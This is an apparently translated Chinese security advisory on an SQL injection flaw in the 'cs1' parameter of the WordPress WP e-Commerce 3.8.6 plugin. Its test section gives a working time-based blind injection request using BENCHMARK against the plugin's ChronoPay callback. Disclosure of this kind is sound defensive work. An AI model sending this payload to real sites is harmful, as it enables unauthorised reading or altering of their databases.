安全研究
安全漏洞
WordPress WP e-Commerce插件"cs1"参数SQL注入漏洞
发布日期:2011-09-21
更新日期:2011-09-21
受影响系统:WordPress WP e-Commerce 3.8.6
描述:
BUGTRAQ ID:
49612
WordPress WP e-Commerce是基于WP和Web 2.0技术开发的一款电子商务购物车插件程序。
WordPress WP e-Commerce插件在"cs1"参数过滤用户数据时存在SQL注入漏洞,远程攻击者可利用此漏洞控制应用程序,访问或修改数据。
<*来源:Miroslav Stampar
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/?chronopay_callback=true
cs2=chronopay&cs1=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&transaction_type=rebill
建议:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://wordpress.org/浏览次数:3114
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
